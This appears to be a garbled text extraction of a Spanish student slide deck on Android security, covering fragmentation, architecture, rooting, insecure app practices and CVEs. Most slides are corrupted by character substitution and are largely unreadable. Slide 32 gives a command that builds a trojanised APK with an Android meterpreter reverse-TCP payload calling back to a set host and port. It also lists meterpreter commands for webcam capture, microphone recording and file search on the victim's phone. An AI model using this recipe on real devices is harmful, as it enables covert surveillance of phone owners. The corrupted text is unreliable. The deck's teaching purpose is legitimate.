8/16/2019 Android Vulnerabilidades
1/34
“VULNERABILIDADES EN
ANDROID”ALUMNO: JUAN CARLOS BARRAGÁN BONILLA.
8/16/2019 Android Vulnerabilidades
2/34
ECOSISTEMA ANDROID
IDC en Q3 2012 Android en!" e# $%& de# 'er("do ')ndi"# (on 13*'i##one+ de )nid"de+
IDC en Q3 2013 ","r("," e# -1& $1& $0& $/&...
8/16/2019 Android Vulnerabilidades
3/34
INICIOS
8/16/2019 Android Vulnerabilidades
4/34
GOOGLE . De+"rro##o de# n)(#eo SO.
CARRIERS: roeen de o 4 "((e+o " d
5ABRICANTES 6 De+"rro##o de 7"rd8
OEMS Ori9in"# E)i;'en M"n)n"# e ine9r"n #o+(o';onene+.
8/16/2019 Android Vulnerabilidades
5/34
CUSTOM ROMS
8/16/2019 Android Vulnerabilidades
6/34
TIOS DE USUARIOS
CONSUMIDORES
ROOTS
INVESTIGADORES DE SEGURIDAD
8/16/2019 Android Vulnerabilidades
7/34
5RAGMENTACION
• MULTILESDISOSITI?OS
• CON5IGURAC7ARD@ARE
• NI?ELES DE A•
TAMAOS DEANTALLA• ERI5ERICOS
DISONIBLES
8/16/2019 Android Vulnerabilidades
8/34
Un ""("ne ;)ede en(onr"r
8/16/2019 Android Vulnerabilidades
9/34
ROBLEMAS EN EL ARAISO 5RAGMENTACION
ACTUALIKACIONES DE SO5T@ARE.
SIN NUMERO DE DISOSITI?OS INSEGUROS.
L"+ ";#i("(ione+ +e ;)eden ;"r(="r ;or e# de+"rro##"dor " r"e+ deSore ;ero )n SO e+ di
8/16/2019 Android Vulnerabilidades
10/34
ROBLEMAS EN EL ARAISO
L" #i,er"(in de n!e+$ er+ione+ de "ndroid elento. OEMS ienden " +er de'"+i"do #eno+ ;"r" ";#i(;"r(=e+. B", -ortin. e+ ";#i("r )n" re;"r"(in de +o<
;"r" )n" "()"# o ie" er+in +on ;rin(i;"#'einei+ene+ Goo9#e iende " re;"r"r +o,re #" er+in "t!l+o
8/16/2019 Android Vulnerabilidades
11/34
BUGS Cono(ido+ (o'o )#ner",i#id"d de ="#
8/16/2019 Android Vulnerabilidades
12/34
SEGURIDAD ?S LIBERTAD
"r" ;reenir "#er"(ione+ "# +o("(ione+ de )+)"rio+ ""n"do+ de$e$t%ili/r el $i$tem 4 d"r #)9"r " #"+ ##de +o;ore inne(e+"ri"+.
M)(=o+ pro+eedore$ ofre"en '"ner"+ ;"r")+)"rio+ >n"#e+ ;"r" de+,#o)e"r #o+ di+;o+iio
8/16/2019 Android Vulnerabilidades
13/34
ARQUITECTURA DE ANDROID1. Android ";;#i("
2. Android 5r"'e8
3. D"#i ir)"#'"(=ine
. U+er+;"(e n"(ode.%. Lin) erne#.
8/16/2019 Android Vulnerabilidades
14/34
ARQUITECTURA DE ANDROID1. A;#i("(ione+ Android ;er'ien " #o+ de+"rro##"dore+ "';#i"r 4 'eo(iene ;"r" e# +i+e'" o;er"io +),4"(ene. Iner;re
8/16/2019 Android Vulnerabilidades
15/34
LIMITES DE SEGURIDAD ERNEL SACE o;er"(ione+ de ,"o nie# de ="rd8"re 4 "((eder "'e'ori" ir)"# 4
USER SACE no ;)ede "((eder " od" #" 'e'ori" de,ido "# #!'ie;or #" CU. ERMISOS +e ,"+"n en e+",#e(er #i'ie+ "# in+"#"r ";
2* Ai$lmiento de pro"e$o$ e+nd"r de Lin)
2. ID de )+)"rio 3ni"o UIDH ;"r" #" '"4or!" de #o+ ;ro(e+o+3. er'i+o+ de# +i+e'" de "r(=io+ ')4 re$trin.ido.
8/16/2019 Android Vulnerabilidades
16/34
EJEMLOSGr);o ;er'ie " )n ;ro(e+o de #e()r" 4 e+(ri)r" en e# dire(orio
Android )i#i" 9r);o+ +);#e'en"rio+ ;"r" ;er'iir ;ro(e+o+ ;"r" "((eder#o+ re()r+o+ (o';"rido+ o ;roe9ido+ "#9)no+ (on(eden dere(=o+"di(ion"#e+ " ;ro(e+o+.
9r);o ;er'ie " )n ;ro(e+o #e()r" 4 e+(ri)r" en e# dire(orio“4$d"rd”
8/16/2019 Android Vulnerabilidades
17/34
UID: e+ ni(o ;"r" ("d"";#i("(in.
8/16/2019 Android Vulnerabilidades
18/34
Co';onene+ re#e"ne+Android
AndroidMnife$t*xml 5 Cd pp de%e de tener !no 6 7de"lr"i8n de npermi$o$6 $er+i"o$6 li%rer9$ extern$:;
T&e Android
8/16/2019 Android Vulnerabilidades
19/34
Rooin9 4o)r dei(e: R"one+ ;"r" o,ener )+)"rio (on ;rii#e9io+ roo:
1. A)di"r +e9)rid"d de "ndroid
2. C"',i"r (on>9)r"(ione+ o (o';or"'ieno.
3. T)ne"r
. Borr"r ";#i("(ione+ ;rein+"#"d"+.
%. 7"(er ,"();+ (o';#eo+ 4 re+")r"(ione+.
*. C"r9"r erne#+ ;er+on"#i"do+
“Rooter "ompromete l $e.!ridd del di$po$iti+o“
U+)"rio+ de d"o+ e;)e+o+ " ";#i("(ione+ roo ,oo #o"der #o(+ 4 "()>r'"d"+ ,orr"d"+.
8/16/2019 Android Vulnerabilidades
20/34
OBTENER ROOT DO@ANLOADING MODE
ANDROID RECO?ERW
CLOC@ORMODERECO?ERW
ABUSING ABDB ERMISOS ADBD DAEMON
TEMORARW ROOT 6 NAND LOC IERDE CAMBIOS AL REINCIAR
ERMANENT ROOT 6 NAND LOC DES7ABILITAR SEG. 5LAG EN BA5LAS7 CON NAND UNLOC
8/16/2019 Android Vulnerabilidades
21/34
ROOT CON NANDX+ UNLOC 1. O,ener roo S=e## +o
8/16/2019 Android Vulnerabilidades
22/34
INSEGURIDAD EN ALICACIO 5ALLAS EN ERMISOS DE A:
DESARROLLADORES DAN MAS ERMISOS DE LOS REQUERIDOS.
TRANSMISION INSEGURA DE DATOS SENSIBLES TTL SSLH: CI5RADO DEBIL O AUSENTE AUSENCIA DE ALARMAS DE SEGURIDAD O ERRORES DE ?ALIDACION DE
CERTI5ICADOS USO DE TEVTO LANO DESUES DE 5ALLAS
5UGA DE IN5ORMACION ATRA?ES DE REGISTROS ?ER 7ISTORIAL @EB W ROBAR IDENTI5ICADORES DE SESION LOGCATH.
INSEGURA COMUNICACIYN ENTRE ROCESOS ICH DE5INICION DE IC ACCESIBLE OR OTRAS ALICACIONES:
INJECTION DIRECTORIO TRANS?ERSAL.
8/16/2019 Android Vulnerabilidades
23/34
5ALLAS EN ERMISOS DE A D"d" #" 9r"n)#"rid"d de# 'ode#o de ;er'i+o+ de "ndroid ="4 o;or)nid"d
de+"rro##"dore+ de +o#i(i"r '"+ ;er'i+o+ de #o+ )e +) ";; ;)ed" re)eri No +e do()'en"n #o+ ;er'i+o+ ei+ene+ denro de #" Android AI ""i#",Android O;en So)r(e roe( AOSH +"rS("n "ndroid .1 ("## o en",i#id"d o
8/16/2019 Android Vulnerabilidades
24/34
TRANSMISION INSEGURA DEDATOS SENSIBLES TTL SSLH CI5RADO DEBIL O AUSENTE
AUSENCIA DE ALARMAS DE SEGURIDAD O ERRORES DE ?ALIDACION DECERTI5ICADOS
USO DE TEVTO LANO DESUES DE 5ALLAS
E# "")e ;)ede re"#i"r+e "r"e+ de '"nin=e'idd#e
Ro,o de Toen en Goo9#e C#ienLo9in ;roo(o#o de ")eni("(in AndroidSo#i(i"r oen e# ()"# ;)ede +er re)+"do ;"r" r"n+"((ione+ +),+e()ene
E# ""("ne ;)ede ;er+oni>("r "# )+)"rio.
8/16/2019 Android Vulnerabilidades
25/34
INSEGURO ALMACENAMIENTDE DATOS Android o9)r"(in 4 IM #o9+ . C)"ndo ()"#)ier "r(=io e+ (re"do " r"\+ de (di9o (o'"ndo+ eerno+ e# ;ro(e+o =ered"," e# )'"+ de e;"dre 49oe (on )n" )'"+ de 000
E+o +i9ni>(" ;er'i+o+ 9#o,"#e+ de #e()r" 4 e+(ri)r".
8/16/2019 Android Vulnerabilidades
26/34
5UGA DE IN5ORMACIONATRA?ES DE #o9+
Lo+ de+"rro##"dore+ )+"n #o+ re9i+ro+ de #o+ #o9de;)r"r.
A;;+ )e ienen e# ;er'i+o de READZLOGS ;)o,ener "((e+o " e+o+ 'en+"e+ de re9i+ro
or 'edio de LOGCAT So#o de .1 ;"r" "r+.
E+ ;o+i,#e o,+er"r "(iid"d 8e, ro,"rideni>("dore+ de +e+in.
Y
8/16/2019 Android Vulnerabilidades
27/34
INSEGURA COMUNICACIYNENTRE ROCESOS ICH L" (o')ni("(in enre ;ro(e+o+ (o')ne+ end ;oin ISeri(e+ A(iiie+Bro"d("+Re(eier+ "nd Conen
oen(i"#e+ e(ore+ de "")e.
C)"ndo )n IC no e+ "+e9)r"do )n" ";; '"#i(io+" e+
+o#i(i" 4 e+ (on(edido.
Se e;one (onenido de d"o+ e+r)()r"do+ 4 e+o ;ro"")e+ de in4e((in o dire(orio r"n+er+"#
8/16/2019 Android Vulnerabilidades
28/34
?ULNERABILIDADES TO 201 S"9e
8/16/2019 Android Vulnerabilidades
29/34
?ULNERABILIDADES TO 201 C?E 201*0$2-
E# &",er ;"+" " +er dmini$trdor 4 ;)ede ree+((di9o+ ,+i(o+ )e 9"r"ni"n )n" ee()(in nor'""re"+ ,+i("+.
e+e " )e " +i';#e i+" ;"re(" )n e#e'eno 9r"e 42 de ("d" 3 +o;ore+ (on Android ;)ed"n er+e e;)n'ero de "")e+ no =" +ido e#e"do.
8/16/2019 Android Vulnerabilidades
30/34
?ULNERABILIDADES TO 201 Medi"e
Se r"" de )n r'".
)ede "
8/16/2019 Android Vulnerabilidades
31/34
C?E 201*0-01 E+" )#ner",i#id"d )e =" +ido +o#)(ion"d" (on r";ide ;or Goo9#e
Se ,"+" en #" in
8/16/2019 Android Vulnerabilidades
32/34
Tro(ni/ndo Android
+sudo sfpa%load android,eterpreter,reversetcpLO"/0123.145.1..131 L&O6/07777 6 8 ,root,Des'top,)i#.
Vie' r!nnin. pro"e$$e$ @@ meterpreter p$
Ser"& for )le @@ meterpreter $er"& 5f *mp
T,e p&oto$ !$in. t&e de+i"e$ "mer$ @@ meterpreter 'e
@@ meterpreter 'e%"m$np 5I Re"ord $o!nd 'it& t&e mi"rop&one @@ meterpreter re"ord
Vie'in. +ideo $trem from t&e de+i"e$ "mer @@ meterpr'e%"m$trem 5I
t&i$
8/16/2019 Android Vulnerabilidades
33/34
t&i$
1. On#4 in+"## ";;+ "nd +o
8/16/2019 Android Vulnerabilidades
34/34
OBSER?ACION: L" (i"# "endr+ )e o'"r 'edid"+ ;"r" +o#)(ion"r#o.
A#9)n"+ de e##"+ ;"+"n ;or ,)+("r )n" "#ern"i" (o'o C%anogen(on+e9)ir "()"#i"r e# di+;o+iio 'i# " ;e+"r de )e no ei+" )di+ri,)(in o>(i"# de#
Top Related